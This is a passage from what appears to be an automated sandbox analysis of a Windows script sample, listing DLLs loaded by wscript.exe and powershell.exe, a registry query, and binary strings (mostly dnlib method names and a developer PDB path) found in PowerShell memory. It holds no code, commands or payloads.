        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2214644675.000001C26A778000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
